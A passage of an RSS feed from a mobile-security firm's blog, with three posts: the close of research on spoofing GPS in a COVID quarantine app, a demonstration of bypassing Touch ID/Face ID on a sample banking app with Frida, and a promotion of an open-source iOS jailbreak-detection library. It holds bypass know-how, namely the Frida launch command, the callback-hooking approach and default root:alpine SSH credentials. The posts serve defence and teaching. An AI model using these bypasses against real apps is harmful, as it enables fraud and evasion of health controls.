Jailbreaking permits root access in Apple’s mobile operating system, allowing the installation of software that is unavailable through the official Apple App Store.</blockquote><p>To trick the quarantine application I had to have a jailbroken device first. It was required to install the GPS spoofing tweak. So, the idea is to detect that jailbreak and appropriately respond. For the quarantine applications maybe it’s a good solution no to trust the GPS localization on jailbroken devices and send Police to verify the user’s location?</p><h3>Freedom vs jailbreaking</h3><p>Here, I need to say I’m totally against blocking applications on devices where the jailbreak is detected. Users should have a choice to use jailbroken or jailed device. However, I also understand the fact that jailbroken devices tend to be less secure. Jailbreaking usually means staying on an outdated iOS version with known vulnerabilities, sometimes killing or modifying important security daemons. I remember the times where the SSH server was bound to all interfaces with the root:alpine credentials. So if you had connected to a public WiFi without device isolation any person would have been able to take over your device and execute any command as root.</p><iframe src="https://cdn.embedly.com/widgets/media.html?src=https%3A%2F%2Fgiphy.com%2Fembed%2FKI56Yfvk0785y%2Ftwitter%2Fiframe&amp;display_name=Giphy&amp;url=https%3A%2F%2Fgiphy.com%2Fgifs%2Fobi-wan-KI56Yfvk0785y&amp;image=https%3A%2F%2Fmedia2.giphy.com%2Fmedia%2FKI56Yfvk0785y%2F200.gif&amp;key=a19fcc184b9711e1b4764040d3dc5c07&amp;type=text%2Fhtml&amp;schema=giphy" width="435" height="273" frameborder="0" scrolling="no"><a href="https://medium.com/media/7036db1aff38059645b94a239891af8b/href">https://medium.com/media/7036db1aff38059645b94a239891af8b/href</a></iframe><p>We need to reach a compromise. High-risk applications have to somehow respond when they are run on the modified environment. In my opinion, the good solution is to perform the jailbreak checks, log it, inform the user that their device is jailbroken and they accept the risk using such a device.</p><h3>Jailbreak detection cannot be fully trusted</h3><p>Jailbreak detection is performed on the device which can be fully controlled by the user. It means that the attacker will always win! If the attacker has root permissions and can modify everything on the device they can also write an anti-anti-jailbreak mechanism. It can be done by modifying the application, creating a <a href="https://yalujailbreak.net/liberty-lite/">special tweak</a>, running a <a href="https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06j-testing-resiliency-against-reverse-engineering#bypassing-jailbreak-detection">Frida script</a> or even creating a <a href="https://www.idownloadblog.com/2020/04/29/kernel-level-jailbreak-bypass/">kernel extension</a>.</p><p>You should always treat jailbreak detection as of another layer of security. It is really important to understand that implementing a <strong>jailbreak detection cannot be your only defense</strong>. The applications always have to be coded securely, doesn’t matter if the device is jailbroken or not.</p><h3>Other COVID applications</h3><p>In this research, I also quickly looked on some other quarantine applications. While I didn’t have access to the activated versions I just performed quick static and semi-dynamic analysis to see if the apps detect jailbreaks. It turned out that only 1 of 5 applications I quickly analyzed had such “protection”.</p><iframe src="https://cdn.embedly.com/widgets/media.html?src=https%3A%2F%2Fgiphy.com%2Fembed%2FdvD0OAETRfCXC%2Ftwitter%2Fiframe&amp;display_name=Giphy&amp;url=https%3A%2F%2Fgiphy.com%2Fgifs%2Fstar-wars-fail-dvD0OAETRfCXC&amp;image=https%3A%2F%2Fmedia2.giphy.com%2Fmedia%2FdvD0OAETRfCXC%2F200.gif&amp;key=a19fcc184b9711e1b4764040d3dc5c07&amp;type=text%2Fhtml&amp;schema=giphy" width="435" height="166" frameborder="0" scrolling="no"><a href="https://medium.com/media/cdc5ddc7e1249c483432d7b579c1b563/href">https://medium.com/media/cdc5ddc7e1249c483432d7b579c1b563/href</a></iframe><h3>Summary</h3><p>The Polish quarantine application on iOS was easily bypassable which could have had an influence on public health. The application had no GPS spoofing protection nor the jailbreak detection mechanisms. When jailbreak detection is not usually important and required there are some types of applications that it should be implemented. Even one, simple security layer may stop the “script kiddies” from bypassing the crucial features. On the other hand, we have to remember that the experienced attacker will always win when the checks are performed on the device. Do not do the false assumptions and always make sure your application is coded securely.</p><p>If you want to implement a jailbreak detection mechanism in your application take a look at our free &amp; open source library — iOS Security Suite. You can find it on the Github — <a href="https://github.com/securing/IOSSecuritySuite">https://github.com/securing/IOSSecuritySuite</a></p><img src="https://medium.com/_/stat?event=post.clientViewed&referrerSource=full_rss&postId=cacc02e2a7f6" width="1" height="1" alt=""><hr><p><a href="https://medium.com/securing/why-is-jailbreak-detection-important-covid-apps-case-cacc02e2a7f6">Why is jailbreak detection important? — COVID apps case</a> was originally published in <a href="https://medium.com/securing">SecuRing</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[Bypassing your apps’ biometric checks on iOS]]></title>
            <link>https://medium.com/securing/bypassing-your-apps-biometric-checks-on-ios-c2555c81a2dc?source=rss-4698055bdb3------2</link>
            <guid isPermaLink="false">https://medium.com/p/c2555c81a2dc</guid>
            <category><![CDATA[touch-id]]></category>
            <category><![CDATA[app-security]]></category>
            <category><![CDATA[ios]]></category>
            <category><![CDATA[ios-app-development]]></category>
            <dc:creator><![CDATA[Wojciech Reguła]]></dc:creator>
            <pubDate>Mon, 27 Jan 2020 14:42:18 GMT</pubDate>
            <atom:updated>2020-01-27T14:42:18.349Z</atom:updated>
            <content:encoded><![CDATA[<figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*m3f2BujN0Jusl5wurhFjow.jpeg" /></figure><p>Using iOS biometrics features like Touch ID and Face ID is a really convenient way to authenticate a user before performing sensitive actions. These actions, of course, depend on apps’ features. Usually, we test apps that use TouchID/FaceID to log in and to confirm financial actions (e.g. wire transfer). But, do these checks can be treated as 100% secure?</p><p>The answer is of course <strong>not</strong>. Biometrics checks are performed on your device, and like any others ‘client-side checks’ can be bypassed if attacker can control the application/device. In this blog post, I want to show you how easy that hack may be done. To perform the attack, we need:</p><ul><li>jailbroken device (if you do not have one, check <a href="https://www.securing.pl/en/testing-ios-apps-without-jailbreak-in-2018/index.html">this presentation</a>),</li><li>Frida,</li><li>text editor. 😉</li></ul><h3>Sample app — SecuBank</h3><p>I prepared a really simple application that asks you for your finger/face and displays a message if the verification was successful or not.</p><iframe src="https://cdn.embedly.com/widgets/media.html?src=https%3A%2F%2Fplayer.vimeo.com%2Fvideo%2F375401746%3Fapp_id%3D122963&amp;dntp=1&amp;url=https%3A%2F%2Fvimeo.com%2F375401746&amp;image=https%3A%2F%2Fi.vimeocdn.com%2Fvideo%2F834159949_960.jpg&amp;key=a19fcc184b9711e1b4764040d3dc5c07&amp;type=text%2Fhtml&amp;schema=vimeo" width="1080" height="1920" frameborder="0" scrolling="no"><a href="https://medium.com/media/090f66ce93d48236e8445ca6d9d07de2/href">https://medium.com/media/090f66ce93d48236e8445ca6d9d07de2/href</a></iframe><h4>Note that the application’s logic was implemented in Swift:</h4><iframe src="" width="0" height="0" frameborder="0" scrolling="no"><a href="https://medium.com/media/e8d41f72d838c96ebeb0bc3bdc1d0544/href">https://medium.com/media/e8d41f72d838c96ebeb0bc3bdc1d0544/href</a></iframe><h3>Frida script</h3><p>Now, we have to write a Frida script that bypasses the check. As you can see in the above-pasted code snippet, the <em>evaluatePolicy</em> uses a callback that determines the result. So, the easiest way to achieve the hack is to intercept that callback and make sure it always returns the <em>success=1</em>.</p><iframe src="" width="0" height="0" frameborder="0" scrolling="no"><a href="https://medium.com/media/36ab007d8d2f5da4ca9e0c4fa099642b/href">https://medium.com/media/36ab007d8d2f5da4ca9e0c4fa099642b/href</a></iframe><h3>Hacking the SecuBank</h3><p>At this moment, we just need to open the SecuBank and load the script with Frida:</p><pre>$frida -U -l bypass.js -f biz.securing.SecuBank --no-pause</pre><iframe src="https://cdn.embedly.com/widgets/media.html?src=https%3A%2F%2Fplayer.vimeo.com%2Fvideo%2F375401733%3Fapp_id%3D122963&amp;dntp=1&amp;url=https%3A%2F%2Fvimeo.com%2F375401733&amp;image=https%3A%2F%2Fi.vimeocdn.com%2Fvideo%2F834159912_960.jpg&amp;key=a19fcc184b9711e1b4764040d3dc5c07&amp;type=text%2Fhtml&amp;schema=vimeo" width="1080" height="1920" frameborder="0" scrolling="no"><a href="https://medium.com/media/fbb82e8db6af17a9886b0eea89aeafd8/href">https://medium.com/media/fbb82e8db6af17a9886b0eea89aeafd8/href</a></iframe><h3>Summary</h3><p>In this article, I showed you again that any kind of local checks can be bypassed, including the biometrics ones provided by the iOS/macOS. These checks are really convenient, but you have always to remember that they cannot guarantee any reliability if the device is jailbroken.</p><p>If you are interested in implementing such jailbreak checks, take a look at the <a href="https://github.com/securing/IOSSecuritySuite"><strong>iOS Security Suite</strong> </a>— our open source project!</p><p><a href="https://medium.com/securing/implementing-anti-tampering-mechanism-in-ios-apps-c85ea9e73e22">Implementing anti-tampering mechanism in iOS apps</a></p><img src="https://medium.com/_/stat?event=post.clientViewed&referrerSource=full_rss&postId=c2555c81a2dc" width="1" height="1" alt=""><hr><p><a href="https://medium.com/securing/bypassing-your-apps-biometric-checks-on-ios-c2555c81a2dc">Bypassing your apps’ biometric checks on iOS</a> was originally published in <a href="https://medium.com/securing">SecuRing</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[Implementing anti-tampering mechanism in iOS apps]]></title>
            <link>https://medium.com/securing/implementing-anti-tampering-mechanism-in-ios-apps-c85ea9e73e22?source=rss-4698055bdb3------2</link>
            <guid isPermaLink="false">https://medium.com/p/c85ea9e73e22</guid>
            <category><![CDATA[security-testing]]></category>
            <category><![CDATA[security]]></category>
            <category><![CDATA[ios-apps]]></category>
            <category><![CDATA[ios]]></category>
            <category><![CDATA[mobile-security]]></category>
            <dc:creator><![CDATA[Wojciech Reguła]]></dc:creator>
            <pubDate>Mon, 20 May 2019 19:16:39 GMT</pubDate>
            <atom:updated>2019-09-05T18:40:43.230Z</atom:updated>
            <content:encoded><![CDATA[<p>Security is a topic that should be considered also by iOS developers. Since the platform cannot be treated as 100% secure, devs and security division need to create a separate threat model for mobile applications.</p><p>For all the years when iOS exists, many different types of application vulnerabilities have been discovered. They can result in a real risk and should be covered at first! After it is done, in most cases, the fire has been extinguished.</p><iframe src="https://cdn.embedly.com/widgets/media.html?src=https%3A%2F%2Fgiphy.com%2Fembed%2Fl0HlCD37sRinmhGyA%2Ftwitter%2Fiframe&amp;display_name=Giphy&amp;url=https%3A%2F%2Fmedia.giphy.com%2Fmedia%2Fl0HlCD37sRinmhGyA%2Fgiphy.gif&amp;image=https%3A%2F%2Fi.giphy.com%2Fmedia%2Fl0HlCD37sRinmhGyA%2Fgiphy.gif&amp;key=a19fcc184b9711e1b4764040d3dc5c07&amp;type=text%2Fhtml&amp;schema=giphy" width="435" height="244" frameborder="0" scrolling="no"><a href="https://medium.com/media/35a54d5bd412a04994a8947de71a915a/href">https://medium.com/media/35a54d5bd412a04994a8947de71a915a/href</a></iframe><p>However, if you are responsible for developing high risk application you will be probably interested in reaching a higher app resiliency. Before attackers find the vulnerabilities they need to analyze your app. This is the moment when you can make their job harder — implement anti-tampering mechanisms and detect if you application has been launched in a malicious environment.</p><blockquote>Disclaimer: Before I show you my solution you need to remember that it is also an additional security layer. Any anti-tampering mechanism <strong>cannot be</strong> a substitution of fixing vulnerabilities or implementing secure code. Otherwise, it will be only a false sense of security.</blockquote><p>To simplify the implementation of anti-tampering mechanism in your iOS application I decided to create the iOS Security Suite — a Swift library that will do all the checks for you! Click here to <a href="https://github.com/securing/IOSSecuritySuite"><strong>visit our Github page and download</strong></a>.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*yRe4kqFmgICBSdMkxTUyTA.png" /></figure><p>Implementing ISS is really easy. To start using it:</p><ol><li>Just copy the files from the repo.</li></ol><pre>git clone <a href="https://github.com/securing/IOSSecuritySuite">https://github.com/securing/IOSSecuritySuite</a></pre><p>2. Install via CocoaPods</p><pre>pod &#39;IOSSecuritySuite&#39;</pre><p>3. Use Carthage</p><pre>github &quot;securing/IOSSecuritySuite&quot;</pre><p>Now, import ISS in your Swift code and you are set! Read the docs to see full description. Below I’m pasting a code snippet example.</p><pre>import UIKit<br> import IOSSecuritySuite</pre><pre>class ViewController: UIViewController {  <br>    <br> override func viewDidLoad() { <br> super.viewDidLoad() <br> }</pre><pre>override func viewDidAppear(_ animated: Bool) {<br> let jailbreakStatus = IOSSecuritySuite.amIJailbrokenWithFailMessage()<br> let title = jailbreakStatus.jailbroken ? &quot;Jailbroken&quot; : &quot;Jailed&quot;</pre><pre>let message = &quot;&quot;&quot;<br> Jailbreak: \(jailbreakStatus.failMessage),<br> Run in emulator?: \(IOSSecuritySuite.amIRunInEmulator())<br> Debugged?: \(IOSSecuritySuite.amIDebugged())<br> Reversed?: \(IOSSecuritySuite.amIReverseEngineered())<br> &quot;&quot;&quot;</pre><pre>let alert = UIAlertController(title: title, message: message, preferredStyle: .alert)<br> alert.addAction(UIAlertAction(title: &quot;Dismiss&quot;, style: .default))<br> print(&quot;TEST: \(message)&quot;)<br> self.present(alert, animated: false)<br> }}</pre><iframe src="https://cdn.embedly.com/widgets/media.html?src=https%3A%2F%2Fgiphy.com%2Fembed%2FxT1R9Ivk4qi5CLoowM%2Ftwitter%2Fiframe&amp;url=https%3A%2F%2Fmedia.giphy.com%2Fmedia%2FxT1R9Ivk4qi5CLoowM%2Fgiphy.gif&amp;image=https%3A%2F%2Fi.giphy.com%2Fmedia%2FxT1R9Ivk4qi5CLoowM%2Fgiphy.gif&amp;key=d04bfffea46d4aeda930ec88cc64b87c&amp;type=text%2Fhtml&amp;schema=giphy" width="435" height="183" frameborder="0" scrolling="no"><a href="https://medium.com/media/22b24e226250527afd66abbcc6d8c074/href">https://medium.com/media/22b24e226250527afd66abbcc6d8c074/href</a></iframe><p>Including this tool in your project is not the only thing you should do in order to improve your app security! <strong>You should also read my </strong><a href="https://www.securing.biz/en/mobile-application-security-best-practices/index.html?utm_source=medium&amp;utm_medium=article&amp;utm_campaign=ios-security-suite"><strong>general mobile security whitepaper</strong></a><strong>.</strong></p><p>If you enjoyed this story, please click the 👏 button and share to help others find it! Feel free to leave a comment below.</p><img src="https://medium.com/_/stat?event=post.clientViewed&referrerSource=full_rss&postId=c85ea9e73e22" width="1" height="1" alt=""><hr><p><a href="https://medium.com/securing/implementing-anti-tampering-mechanism-in-ios-apps-c85ea9e73e22">Implementing anti-tampering mechanism in iOS apps</a> was originally published in <a href="https://medium.com/securing">SecuRing</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
        </item>
    </channel>
</rss>